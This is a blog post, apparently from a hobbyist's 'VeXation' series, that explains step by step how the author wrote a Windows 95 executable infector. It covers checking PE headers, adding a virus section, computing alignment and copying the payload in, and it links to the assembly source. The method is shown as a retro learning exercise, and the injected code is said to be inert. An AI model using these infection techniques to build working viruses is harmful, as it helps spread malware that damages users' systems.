A good executable infector needs to check that:
  1. The target file is a true executable (e.g. not something else renamed to have an .exe extension).
  2. The target file is a supported executable format (e.g. a PE executable).
  3. The target file is a "normal" PE executable (e.g. not a DLL).
  4. The target file's code is the right architecture (e.g. x86 code).
  5. The target file is for a supported Windows version (e.g. Win95 not NT).
  6. The target file has space for the infection, or can support adding space.
  7. The target file hasn't already been infected.
There's a lot to consider! Since I'm targeting Windows 95 I knew the answer to all of the above involved understanding the Portable Executable (PE) format. This is the native executable format for Win95 and supplies ways for a diligent virus writer to check all of these things.

I found there was no better resource for understanding PE's than Matt Pietrek's classic from 1994: "Peering Inside the PE: A Tour of the Win32 Portable Executable File Format". It's a lot to take in at once but I hope calling out the most important parts as I go along will make it a bit more accessible. If you've been around the block with modern Windows much of this will be familiar because Windows still uses PE executables!

If you're more visually minded then Ange Albertini's excellent PE 101 Illustrated is another great companion resource to have handy.

PE 101 illustrated by Ange Albertini


Checking a target executable file

At a high level checking a target file is pretty straight forward. I needed to:

  1. open the file for reading.
  2. check the overall file size.
  3. memory map the file.
  4. carefully check offsets within the memory mapped contents.

To open an existing file I need to use the counter-intuitively named CreateFileA function from the Win32 API. This returns a handle pointer for the file that can be used for further operations. The handle doesn't allow reading from the file by itself but can be used with API calls that can.

To get the file size I used the handle from CreateFileA with the GetFileSize function. Windows supports file sizes from 0 to 2^64 bytes so the return value from GetFileSize is split into a lower order DWORD (four bytes) returned in the eax register (the win32 api uses the "stdcall" calling convention) and a higher order DWORD (stored using the pointer provided as input to GetFileSize). Since I'm only concerned with verifying a target file is at least big enough to hold the expected PE header structures I can ignore the pointer to the higher order DWORD and just examine the lower order DWORD returned  directly from GetFileSize.

There are two paths forward to read and write data from the file handle. Either using SetFilePointer and ReadFile/WriteFile or using memory mapping. I chose to use memory mapping because it involved making less API calls and seemed slightly more straight forward.

Memory mapping requires calling CreateFileMappingA using the file handle from CreateFileA to get yet another handle, this time to a file mapping object. I was able to use the file mapping object handle with MapViewOfFile to map a specified portion of the underlying file into memory. The return value from this function is a pointer to the region of memory the file was mapped and it's possible to read and write from this region to access and change the file's contents.


Offsets to check

With the file memory mapped it's possible to check whether it can be infected by examining key offsets within the DOS and PE headers. Initially when I was looking at example PE infector source code from this era I found most were using numeric offsets as magic numbers throughout the code. For example, here's one snippet I found that copies the file and section alignment from a PE header using numeric offsets:


I'm not sure if this is because programmers were often ripping working assembly from viruses found in the wild missing source level context or if it was just how people did it at the time. Either way I found it made code that was difficult to read.

Life was much easier when I used my assembler's ability to define structures. TASM/MASM both support the STRUCT keyword for this. If there was a STRUCT for the PE header and its optional header then the section and file alignment fields could be accessed without using numeric offsets like 0x3C and 0x38:


I found that the MASM32 distribution came with a great windows.inc file that contained many predefined structure definitions, including the ones most important for PE manipulation:  IMAGE_DOS_HEADER and IMAGE_NT_HEADERS. One thing I noticed was that the windows.inc field names didn't always match up to the PE docs exactly (e.g. SecHdrVirtualAddress vs VirtualAddress). The reason for this is because MASM (and TASM in compatibility mode) doesn't locally scope names within structs, meaning there can be only one structure field named VirtualAddress across all structs. If another struct needs a field for a similar purpose it can't use the same name and has to add a prefix (e.g. SecHdr for the section header).

Example IMAGE_OPTIONAL_HEADERS struct

For this project I needed to check each target file for following things to decide if it could be infected:
  1. There should be an IMAGE_DOS_HEADER DOS MZ header at the very start of the file.
  2. The e_lfanew pointer from the IMAGE_DOS_HEADER should point to an IMAGE_NT_HEADERS PE header.
  3. The IMAGE_NT_HEADERS' OptionalHeader's Subsystem field should be Windows GUI or Windows CUI (e.g. a graphical or command line Windows program).
  4. The IMAGE_NT_HEADERS' FileHeader's Machine field should be i386.
  5. There shouldn't be an IMAGE_SECTION_HEADER present with the same name as the    virus code section (or it's already infected).
  6. There should be enough space for an additional IMAGE_SECTION_HEADER to be added.


Adding virus code

There are lots of ways to add new virus code to an existing PE executable. Three common ways I considered were:
  1. Adding the virus code in one piece in the unused padding of an existing code section.
  2. Breaking the virus code into pieces and putting those pieces in unused space  found in an existing code section.
  3. Adding the virus code as a whole new code section.
Option 1 is straight forward but could mean some target files won't have enough space to be infected. PE code sections are usually aligned on disk by 0x200 bytes (the actual alignment is specified in the PE header), meaning that in the best case if an existing code segment were 0x201 bytes before being aligned with padding the virus could be up to 0x1FF bytes. In the worst case if the existing code segment was exactly 0x200 bytes before alignment then there would be 0 bytes left for an infection! Since I wasn't sure what an "average" amount of padding was for executables from this era, or how big my virus would eventually be I decided not to pursue this approach to start with.

Option 2 is more complex but can make better use of free space in places other than the section padding. The complexity involved in breaking up the virus code into little segments and connecting them up at run-time was too much to  make this a good choice when I was just starting out.

Option 3 is what I settled on. This option gave me freedom to make my virus as big as I wanted and looked like a good place to start. The only space constraint this approach has is making sure that there is enough room in the PE header for one new section metadata entry.

The downsides of this approach relate to anti-virus. Putting it bluntly adding a new section is not subtle. You can identify whether a file is infected or not based on the presence of the new section (in fact that's how I prevent reinfection). You could even "inoculate" files against infection by adding a benign section with the same name as the virus section. Unlike options 1 and 2, this option also changes the infected file's size on disk. Lastly, from an AV perspective it's easy to disinfect infected programs by restoring the original entrypoint and deleting the malicious segment. Since I was mostly unconcerned with AV these downsides were acceptable.

At a high level adding a new section means:
  1. Increasing the NumberOfSections WORD in the IMAGE_NT_HEADERS' FileHeader.
  2. Finding the end of the IMAGE_SECTION_HEADERS array and adding one more entry.
  3. Calculating the correct VirtualSize, SecHdrVirtualAddress, SizeOfRawData and PointerToRawData for the new IMAGE_SECTION_HEADER.
  4. Setting the correct SecHdrCharacteristic flag for the new IMAGE_SECTION_HEADER.
Increasing the NumberOfSections is self explanatory. Finding the end of the IMAGE_SECTION_HEADERS array requires some math. The start of this array is always immediately after the end of the base PE IMAGE_NT_HEADERS structure. I knew where the start of the PE structure is (the e_lfanew pointer from the IMAGE_DOS_HEADER) and I knew the size of the IMAGE_NT_HEADERS structure. That gives me the end of the PE structure and the start of the IMAGE_SECTION_HEADER array. I can calculate the offset to the end of the array as the number of sections (NumberOfSections) multiplied by the size of each IMAGE_SECTION_HEADER structure.



Having to calculate two sizes (VirtualSize, and SizeOfRawData) and two offsets (SecHdrVirtualAddress and PointerToRawData) for the section header metadata may seem strange at first. The duplication is more understandable when put in context. PE sections describes something that exists both on disk, and eventually once loaded by the OS, in memory. These two contexts have different requirements. As one example on disk it's beneficial for code to be aligned to suit the filesystem. In memory it's beneficial for code to be aligned to suit memory pages. Having one format that can describe both the "virtual" (in memory) and the "physical/raw" (on disk) makes sense and allows for a lot of flexibility.

Calculating the right virtual size and raw data size required knowing the original unaligned size of the virus code. TASM provides a handy tool for this known as the "location counter symbol".

Borland Turbo Assembler 5.0 "Location Counter Symbol" Docs

By placing a label (viral_payload) at the very start of the virus code I could use the location counter symbol ($) in an equate that provided an accurate size constant (viral_payload_size) for the rest of the code to use:

viral_payload_size EQU $ - viral_payload

This equate stayed current as I tweaked the code and avoided having to update a fixed value. The unoptimized assembly linked to later in this post ends up having viral_payload_size EQU 38Eh, a pretty beefy 910 bytes.

Aligning the virtual and raw sections according to the required alignment sounds difficult but is just a way of saying that the unaligned size must be made evenly divisible by the alignment value. The calculation is:

(((originalSize - 1) / alignment) + 1) * alignment

A typical value for the PE optional header section alignment is 0x1000, so the adjusted VirtualSize of the new section assuming the viral_payload_size is 0x38E is:

VirtualSize = (((0x38E - 0x1) / 0x1000) + 0x1) * 0x1000 = 0x1000 = 4096

For the SizeOfRawData a typical file alignment value is 0x200, so the calculation is:

SizeOfRawData = (((0x38E - 0x1) / 0x200) + 0x1) * 0x200 = 0x400 = 1024

In both cases you can see the aligned size ends up larger than the original virus size. The extra space in the file and in memory will be empty padding and that's why file infectors often find the space they need in existing executable segments.

The SecHdrVirtualAddress value is a relative virtual address (RVA) that specifies where the section will start in memory relative to where the loader puts the executable. Many things are specified as RVAs so it's important to be familiar with this concept. I wanted my new section to start after the end of the existing final section in the target executable which meant the SecHdrVirtualAddress for the new section needed to point at the last section's SecHdrVirtualAddress plus the last section's VirtualSize.

Similar to the SecHdrVirtualAddress, the PointerToRawData value is an RVA that specifies where the section will start relative to the beginning of the PE file on disk. The new section should start after the last section on-disk so the PointerToRawData value needed to be the last section's PointerToRawData plus the last section's SizeOfRawData.

The last part was setting the SecHdrCharacteristics flag. The new section contains code and should be executable and readable. In the future I know I'll want the virus code to be able to modify parts of its own section so I also wanted the section to be writable. All told this meant the flag value was the combination of the IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_EXECUTE and IMAGE_SCN_CNT_CODE bitmasks.



Writing the virus code into the new section

The last trick I needed to perform is to expand the target's overall file size. The new section metadata that gets added is inside of existing slack space between the end of the IMAGE_NT_HEADERS structure and the beginning of the first section and didn't require changing the file size. The new section content will be added at the end of the file and so I had to enlarge the overall executable to make room after the last section's contents.

Increasing the file size turns out to be pretty easy and only required remaping the file using CreateFileMappingA and MapViewOfFile again, adjusting the arguments to account for the new space. Because I'm modifying a PE file on disk I need to adjust by the new section's SizeOfRawData not the original unpadded size or the VirtualSize.


After the enlarged view of the file is mapped it was just a matter of copying the generation 0 code that is currently executing from memory and into the new section. For this I used a fun bit of self-referential code that relies on the viral_payload label and the new SizeOfRawData to know where to begin copying from and how many bytes to copy.



Assembly code

The full code that implements all of the above is available in the VeXation Github
repo under the `minijector` folder. "Mini" because it isn't a finished virus, "jector" because saying "injector" over and over was driving me batty.

Assuming you have the same dev environment set up as I do you can build the project with make (or with debug symbols using make -DDEBUG). If you want to step through an infection process run make run which will copy a clean calc.exe into the project directory and then run td32 on the minijector.exe generation 0 binary to let you step through the infection process.

A few high level notes:

  • The majority of the good stuff is in minijector.asm.
  • I used .model flat, stdcall at the start so that subsequent call instructions for Win32 APIs are handled correctly by default. Win32 uses the stdcall calling convention and it's a pain to push arguments onto the stack in reverse order manually.
  • I didn't use any of TASM's "Ideal" mode and the code should be MASM compatible.
  • My windows.inc file is a stripped down version of what comes with the MASM32 SDK. Using the unaltered full windows.inc with default tasm settings results in build errors because it's SO BIG. I cut it down to only what minijector uses.
  • I chose to name the virus segment ireloc. That's because most PE binaries already have a reloc section and an idata section. ireloc sounds like it should belong, no? :-)
  • I tried to write defensive code. Lots of public virus source code skips checking error returns from API calls or assumes the DOS/PE headers aren't malicious/invalid and I hope paying attention to that stuff makes my extremely   simple virus marginally less lame. That said, I'm sure I messed something up and a malicious PE file could be crafted that will crash the infection routines (Send me a sample if you make one!)
  • I used a lot of locally scoped (@@ prefixed) labels as something between a comment and a marker post for navigating the sourcecode. This is probably a "quirk" of my own style and not a great practice.
  • I'm a pretty novice assembly programmer, so (kind) feedback is welcome!

Verifying the work so far

Whenever computers are involved I find it's helpful to verify my work in as many ways as possible. Since PE files exist both at-rest on disk and in-memory at-runtime I found it useful to verify both states of an infected calc.exe looked like I expected after running the minijector.exe generation 0 infector in the same directory.

Borland Turbo Assembler 5.0 comes with a handy program called tdump short for (hold your laughter) "Turbo Dump". This command lets you easily see PE metadata for a given executable. I've included the tdump output I referenced for a clean calc.exe here, and the tdump of an infected calc.exe here.

There is one important difference in the output that I used to verify the work so far. The original calc.exe has the following sections in the object table:


The infected calc.exe has one more section (the virus section!) in addition to all of the above:


It was also reassuring at this point to see an RVA value (corresponding to the the SecHdrVirtualAddress field) that was higher than all of the previous section's RVA values, as well as a Physical Offset (corresponding to the PointerToRawData field)  that was higher than all of the previous section's Physical Offset's. Also reassuring was seeing the two sizes of the new section both seemed properly aligned and matched my earlier padding calculations.

As mentioned before the new virus section is not subtle and its flags value (corresponding to the SecHdrCharacteristics field) make it even less so. I set the characteristics flag of the section to be read/write as well as executable in preparation for future work and a writable code section will likely tickle some AV heuristics.

To be extra sure things were working as expected I used the values from tdump as a map into a raw hexdump -C of both the clean calc.exe and the infected calc.exe. I cheated here and ran hexdump from my Linux host because I really didn't want to find a hex dump utility for Windows 95. I included the hexdump output from a clean calc.exe here and from the infected calc.exe here.

Looking at the diff between the two hexdumps showed what I was expecting. Early in the file there was a diff to the number of sections (a 0006 changed to a 0007). There is also an addition of new section metadata including the .ireloc string bytes (2E 69 72 65 6C 6F 63 00 == ".ireloc\0"). Towards the end of the file was a big blob of new data that isn't present in the original file (the virus code!).

That confirmed things look good at-rest on disk, but what about at-runtime when the infected calc.exe is loaded into memory? To verify this I turned to the trusty Turbo Assembler debugger td32.

Running the infected calc.exe in td32 initially generated a warning about there being no debug symbols (this is expected). After closing that I found myself at address 0x0040534E. I was able to turn back to the tdump output to understand why that is. The PE was loaded at the base address 0x00400000 and tdump says the entry point RVA is 0x0000534E. Add those two together and you get 0x0040534E, the start address of the original calc.exe code and the location the debugger is paused.

Since I didn't change the entry point of calc.exe to point to the new segment and the virus code I had to go out of my way to find it in memory to look at the dissassembly. I found the easiest way to do that (while execution is still paused at the start of the calc.exe code) was to:

  1. right click the viewing area and choose "Go To".
  2. enter the expression 00400000 + 00013000
Enter the target expression

The disassembly should look familiar

Why is 0x00013000 used in the expression? Back in the tdump output I saw that value is the RVA of the virus segment. Adding it to the base address the infected PE was loaded at (0x00400000) gives the start of the virus code in memory.

Looking at the disassembly that was now in view let me quickly see that the right code was injected. The most obvious "tell" for me was the comparison with 0xFFFFFFFF done a few instructions after the start of the disassembly. That's the cmp eax, INVALID_FILE_HANDLE_VALUE instruction from line 61 of minijector.asm. Neat!

The combination of the tdump output, the hexdump output, and the state of the program at runtime in td32 all gave me confidence that I'm on the right track.

Conclusion

Wow, that was a lot of work! Before getting too excited there's a few hard realities to face. First off, all of the code I injected is entirely inert. Since the entry point RVA wasn't changed it won't ever be run. There won't be a generation 2. Second, and more importantly, even if the code was run it wouldn't work! There's three important reasons why:

  1. It assumes it was loaded in the same location as generation 0/minijector.exe, not the new segment location in calc.exe!
  2. It references locations that were part of a data segment that wasn't copied to the infected file!
  3. It assumes the locations of all of the kernel32.dll win32 API addresses  that are used won't change from where they were for generation 0!

Why go through all the trouble of building a file infector that only infects once? Well, you have to start somewhere :-) This was the easiest way I could think to start out and it let me write a more "vanilla" program. The remaining problems help illustrate the unique requirements of virus code compared to normal program code. The solutions are quite interesting and unfortunately will have to wait until next time.

As always, I would love to hear feedback about this project. I'm finding it somewhat challenging to decide on what level of detail to share and what knowledge to assume (e.g. about general assembly programming) so thoughts here are particularly welcome! Feel free to drop me a line on twitter (@cpu) or by email (daniel@binaryparadox.net).